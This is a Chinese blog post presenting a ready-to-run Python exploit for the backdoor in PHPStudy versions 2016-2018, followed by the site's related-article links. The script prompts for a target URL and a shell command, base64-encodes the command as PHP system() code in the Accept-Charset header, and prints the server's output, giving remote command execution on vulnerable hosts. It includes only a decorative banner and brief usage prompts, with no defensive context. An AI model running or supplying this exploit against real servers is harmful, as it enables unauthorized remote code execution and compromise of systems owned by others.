[2016-2018]phpstudy的exp制作

扣脚大汉在网络2023-11-05 0:34

[2016-2018]phpstudy的exp制作

用python的requests模块进行编写

修改请求数据包进行远程代码执行

python 复制代码 
import requests
import base64
def remove_code_execute():
    try:
        url = input("请输入要测试的网址:")
        cmd = input("想要执行的命令:")
        cmd = f"system('{cmd}');"
        cmd = base64.b64encode(cmd.encode()).decode()

        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
            "accept-encoding": "gzip,deflate",
            "accept-charset": f"{cmd}"
        }
        response = requests.get(url=url,headers=headers)
        relust=response.content.decode("GBK")[:response.content.decode("GBK").find("<!D"):1]
    except Exception:
        print("请检查是否是url错误或者命令错误")
        print("请检查操作系统和命令是否匹配")
    else:
        print(f"命令执行结果:\n{relust}")
print("""
        PHPStudy_2016-2018

.............................................:.:..............................................tt,..t
..........................................:tfjjjft:...........................................itt::.
.........................................;fLLLGGLfjt,:.........................................;tj,.
.........:.:.....:.....................:;fLLGGDDGLLfjt:.........................................;ttt
......:.... ........... ...............,fLGGGDEEDGGGGf,..........................................,tt
..##i###.  W:::...L...jjLKff...........:fGDDDDDEDDGGGL,......:. . ...;D.....::...:,:...:....:..t....
..f..L##.# ::.#####WW.itEii ............LDDDGGGjLDEDGfj......jf.,,E L.W##K##W#W#itWjfft#W###Wif#fjjt
...i.jE,:j:iG .:..W...;;D;;;............LGDDDGLjjGEDfi:......# .. D.#L,#::.,Df.::::.K..:iLE...,. G..
...#.. ,.f.jL.,:.#::. .:E...............iGDDDGLfGDDL..........#.::,D#.E#G..#.K.. #L###..#.#:..#EWW#.
..i:fLf,:Lt:L.W E: G.:.:ji::...........:.tGjGGfjLfjf..........;:..L:#: #.;W#####tK..K:.######j#.:D:.
.. ...##.f.##.:#: j.;;#: :K#..............Liiii;tit:........ #..:.E.#i:W.,:.#iW::W,:K,,:.#tE::#,;D:,
........................................jKi;ii;,iit.............,i. G:t,.:D:...j.L.....D:...;.L.....
......................................DEWKKjiiijti..................:.:....:... .:......:.....::....
.....................................:EKKWWEijLfftL,i................ .....:. :.....................
.................................jKKD::KKWWKGtjjtDW:fE,.......####.:..#.. .:t.E.....................
................................iKKKKD:DWWWWWf;itWKL:KKG:.....WWWK.,ii#iit...,:.....................
...............................:KKKKKKiiWWKWWWKKWWKE:KKKK:....###W....W:.:.,,;,;....................
..............................:EKKKKKKE;WWWEKWWWWWWE:KKKKK:..######..::.. :,,;,,....................
...............................KKKKKKKWiWWWWKKKWWWWD,KKKWKK...K.##K::#:L .ii;Eit....................
..............................tKKKKKWWWiWWWWWWWKKKEjfGKWWWW::L Gi,:.#:E.Dj.L;:#:....................
.............................:KKKWWKWWWjWWWWWWWWWWW;WWEWWWWK;:..:.:.:..:....:: .:...................
............................,KKWWWWWWWEKWWWWWWWWWWLjWWWWWWWKWD......................................
.........................:KKKWWWWWWWjfWWWWWWWWWWDLKW.,DWWWWWKKKKKKKG:...............................
.......................GKKKKWWWWWLiEWWWWWWWWWWt;..............:LWKKKKKKKKE:.........................
.....................:jKWKKKWWWWfiDWWWWWWWWWWG,.................:jWKKKKKKKKi........................
.....................;KKKKKWWWWLtGWWWWWWWWWWDi...................:.iKKWKKKKKG.......................
....................,EKKKKKKKWWGLWWWWWWWWWKLL:......................:fWWKKKKK.......................
...................:LKKKKWELLGLEWWWWWWWWWKEj.......................,tititLKEEj:.....................
..................:iKKKKKLfffLGEDDEKKKKEEED:......................itttiiiiL;iD......................
..................,KKKKKj.jffLLGDGGGDGGDDDEEt....................jjtttiiiij;Li......................
.................,GKKKK;::fLLGGGGGGGDGGDDDDDG,.................:.jjtLiiiittjLt......................
,:.............,GKWE;:...:GGGGGGGGGGGGGGGGGGG;..................Ljjjttttftjjfi......................
,,:...........,LWKK;:....:LGGGLLLLLLLLLLLLGLLt..................GffjjjjLjjjfLt:.....................
,,,,:........:iKKKf:......fffLLLLLLLLLLLLLLLff:.................tfLfjjfLjfffL,...............::.::..
,,,,,........,GKWWt:......fffLLLGGGLLLLLLLffffj.................:LLfffLffffL;................::.::..
,,,,,,:......,KKWWi......:ffffLGGGGGGLLLLLLffff..................;LLLLfffLLj.................::.....
,,,,,,,:...:,;;LWK;.......ffffffLLDEGDDGGLLfffji:.................iGLLLLLLt.........................
,,,,,,,,:..:i;;iii:.......fffffffLG:.DDDGLLffjjj:.................:.tLLGf:......:::.................
,,,,,,,,,::;iii,:;:.......LffffffLL..fDDGLLLffjj;..................:.:.:....:.....:.................
,,,,,,,,,,,,ii;:,;:.......;fffjjjfL...EDGGLLfjjjj.....................................::.........:..
,,,,,,,,,,,ii;,::;:........fffjjjfL...tGGGLffjjjj:............:.....................................
,,,,,,,,,,,ii,,...:........fffjjjfL...:GGGLffjjjjt................:::...............................
,,,,,,,,,,,,;;,............jfjjjjjL.....GGLLfjjjjf............:.........:.........................::
,,,,,,,,,,,,,,,............;fjjjjjf...::jGLLffjjjf......................:.........................::
,,,,,,,,,,,,,,,,:...........fjjjjjf:.....GLLffjjjj;.........:,;.WG,:j:W...........D:f. ...........::
,,,,,,,,,,,,,,,,,:..........jjjjjjj;...:.,LLffjjjjf...........:.t.::W,   ,WW#WW#,..K..:.:......:::..
,,,,,,,,,,,,,,,,,,:.........jjjjjjjj...:..tLffjjjff..........fK..#:jW..W.,.:fi:::..K..:.::...::::...



                                                    --xl
        frist : please your url
        sec   : please input your command
        """)
remove_code_execute()
相关推荐
饮长安千年月7 天前
西湖论剑决赛IoT开发板 rce复现
物联网·网络安全·漏洞
core5129 天前
“可通过HTTP获取远端WWW服务信息”漏洞修复
nginx·漏洞·openresty·可通过http·获取远端www服务信息
H轨迹H11 天前
CTFHub-RCE漏洞wp
网络安全·渗透测试·rce·web漏洞·ctfhub
NPE~15 天前
[漏洞篇]SQL注入漏洞详解
数据库·安全·渗透测试·教程·漏洞·sql注入
扣脚大汉在网络1 个月前
CVE-2025-0411 7-zip 漏洞复现
网络安全·漏洞
星尘安全1 个月前
急需升级,D-Link 路由器漏洞被僵尸网络广泛用于 DDoS 攻击
网络·智能路由器·ddos·漏洞·cve
网络安全筑盾者-燕子2 个月前
【入门级】零基础小白入门挖漏洞看——漏洞扫描工具大全
网络·计算机网络·网络安全·漏洞·挖漏洞·漏洞工具
深渊启源2 个月前
用 Ingram 和 masscan 来扫描全网存在漏洞的camera
网络安全·漏洞·ingram·masscan
明弟有理想2 个月前
Chrome RCE 漏洞复现
前端·chrome·漏洞·复现
摸鱼也很难2 个月前
RCE 命令执行漏洞 && 过滤模式 && 基本的过滤问题 && 联合ctf题目进行实践
漏洞·ctf·ctfshow·rce命令执行
热门推荐
01DeepSeek各版本说明与优缺点分析02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04本地部署DeepSeek教程(Mac版本)05本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程06DeepSeek r1本地安装全指南07太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)08DeepSeek RAGFlow构建本地知识库系统09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10Page Assist - 本地Deepseek模型 Web UI 的安装和使用